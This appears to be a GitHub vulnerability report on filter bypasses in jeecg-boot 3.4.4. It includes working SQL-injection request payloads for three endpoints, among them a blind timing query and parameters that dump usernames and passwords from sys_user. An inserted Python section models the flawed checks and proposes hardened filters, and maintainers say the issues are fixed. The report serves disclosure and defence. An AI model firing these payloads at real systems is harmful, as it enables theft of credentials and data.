
jeecg-boot 3.4.4 has a SQL injection vulnerability #4393

Closed
Zer0Bs opened this issue Dec 10, 2022 · 2 comments

Zer0Bs commented Dec 10, 2022

Version: 3.4.4
Front-end version: vue2
Problem description: the SQL injection detection code can be bypassed.
Screenshots & code:

The SQL comment regex in the SqlInjectionUtil class is

private final static Pattern SQL_ANNOTATION = Pattern.compile("/\\*.*\\*/");

`.` cannot match %0A, so `/*%0A*/` can be used to bypass it.
The keyword check requires a space after the keyword, which leads to a bypass:

private final static String XSS_STR = "and |extractvalue|updatexml|exec |insert |select |delete |update |drop |count |chr |mid |master |truncate |char |declare |;|or |+|user()";

The blacklist in the AbstractQueryBlackListHandler class:

ruleMap.put("sys_user", "password,salt");

In the isPass function, ruleMap.get(name) returning null is enough to bypass it; sys_user, (sys_user), sys_user%20 and similar can be used for the bypass.

There are multiple injection points:

  1. The /sys/duplicate/check endpoint:
dataId=2000&fieldName=(select(if(((select/*%0A*/password/*%0A*/from/*%0A*/sys_user/*%0A*/where/*%0A*/username/*%0A*/='jeecg')='eee378a1258530cb'),sleep(4),1)))&fieldVal=1000&tableName=sys_log

  2. /sys/api/getDictItems
    This endpoint performs no signature check:

?dictCode=sys_user%20,username,password

  3. sys/dict/queryTableData
?table=%60sys_user%60&pageSize=22&pageNo=1&text=username&code=password

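The following is an added example, not code from the issue or from jeecg-boot, that models the three checks the report describes and replays its request parameters against them. The SQL_ANNOTATION regex, the XSS_STR keyword string and the ruleMap entry are copied from the report; the functions weak_filter, weak_is_pass, strong_filter, strong_is_pass, normalize_identifier and check_dict_code are my own simplified stand-ins for the project's logic, and the hardened variants are a suggestion for illustration, not the fix the maintainers actually shipped.

```python
import re
from urllib.parse import unquote

# Constructed model of the three checks described in the report (example code,
# not jeecg-boot's own implementation). The regex, keyword string and rule map
# entry are copied from the report; the surrounding logic is a simplification.
SQL_ANNOTATION = re.compile(r"/\*.*\*/")   # '.' does not cross a newline without DOTALL
XSS_STR = ("and |extractvalue|updatexml|exec |insert |select |delete |update |drop |count |chr |"
           "mid |master |truncate |char |declare |;|or |+|user()")
KEYWORDS = XSS_STR.split("|")
RULE_MAP = {"sys_user": "password,salt"}   # AbstractQueryBlackListHandler blacklist

# Request parameters as they appear in the report (constructed test inputs, URL-encoded
# exactly as a client would send them).
FIELD_NAME_PAYLOAD = ("(select(if(((select/*%0A*/password/*%0A*/from/*%0A*/sys_user/*%0A*/where"
                      "/*%0A*/username/*%0A*/='jeecg')='eee378a1258530cb'),sleep(4),1)))")
DICT_CODE_PAYLOAD = "sys_user%20,username,password"
TABLE_PAYLOADS = ["sys_user%20", "(sys_user)", "%60sys_user%60"]


def weak_filter(raw: str) -> list:
    """Model of the bypassable check: decode (as the servlet container does), lower-case,
    strip single-line /*...*/ comments, then look for each keyword as a plain substring."""
    v = SQL_ANNOTATION.sub("", unquote(raw).lower())
    return [k for k in KEYWORDS if k in v]


def weak_is_pass(raw_table: str) -> bool:
    """Model of isPass: a table name with no rule in the map is allowed through, and the
    decoded name is used verbatim, so 'sys_user ', '(sys_user)' and '`sys_user`' all miss."""
    return RULE_MAP.get(unquote(raw_table)) is None


# Hardened variants (my own suggestion for illustration, not the project's actual fix).
SQL_ANNOTATION_FIXED = re.compile(r"/\*.*?\*/", re.DOTALL)  # non-greedy, spans newlines
KEYWORD_RE = re.compile(
    r"\b(and|extractvalue|updatexml|exec|insert|select|delete|update|drop|count|chr|mid|"
    r"master|truncate|char|declare|or|user)\b|;|\+")


def strong_filter(raw: str) -> list:
    """Decode, lower-case, replace every comment with a space (MySQL treats a comment as
    whitespace, so 'select/**/x' is 'select x'), then match keywords on word boundaries
    instead of requiring a trailing space."""
    v = SQL_ANNOTATION_FIXED.sub(" ", unquote(raw).lower())
    v = re.sub(r"\s+", " ", v)
    return sorted({m.group(0) for m in KEYWORD_RE.finditer(v)})


def normalize_identifier(name: str) -> str:
    """Canonicalise an already-decoded identifier before the blacklist lookup: drop
    backticks, quotes, parentheses and whitespace, then lower-case."""
    return re.sub(r"[`\"'()\s]", "", name).lower()


def strong_is_pass(table: str, columns) -> bool:
    """Blacklist check on decoded values: normalise the table name, then refuse any request
    that names a blacklisted column of that table."""
    blocked = RULE_MAP.get(normalize_identifier(table))
    if blocked is None:
        return True
    blocked_cols = {c.strip() for c in blocked.split(",")}
    return not any(normalize_identifier(c) in blocked_cols for c in columns)


def check_dict_code(raw: str) -> bool:
    """Validate a 'table,text,code' dictCode as used by /sys/api/getDictItems: reject
    injection keywords first, then apply the blacklist to the decoded parts."""
    if strong_filter(raw):
        return False
    parts = unquote(raw).split(",")
    if len(parts) < 3:
        return False
    return strong_is_pass(parts[0], parts[1:])


if __name__ == "__main__":
    print("weak filter on fieldName payload:", weak_filter(FIELD_NAME_PAYLOAD))      # []
    print("strong filter on fieldName payload:", strong_filter(FIELD_NAME_PAYLOAD))  # ['select']
    for t in TABLE_PAYLOADS:
        print(f"{t!r}: weak={weak_is_pass(t)} strong={strong_is_pass(unquote(t), ['password'])}")
    print("dictCode payload accepted:", check_dict_code(DICT_CODE_PAYLOAD))           # False
```

Two points the model makes visible: stripping comments to an empty string is not enough even with DOTALL, because `select/*%0A*/password` collapses to `selectpassword` and still never contains `select ` (the comment has to become whitespace and the keyword match has to stop depending on a trailing space), and the blacklist lookup has to run on a canonicalised identifier, otherwise every spelling of the table name that MySQL accepts but the map does not contain is a free pass.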
tygithub1 commented

The `/*%0A*/`, sys_user, (sys_user), sys_user%20 and %60sys_user%60 issues have been fixed.

/sys/api/getDictItems is used for calls between microservices and has no signature check; if you use microservices, you can block calls to the /sys/api/ endpoints in the gateway filter.

zhangdaiscott (Member) commented

Fixed.
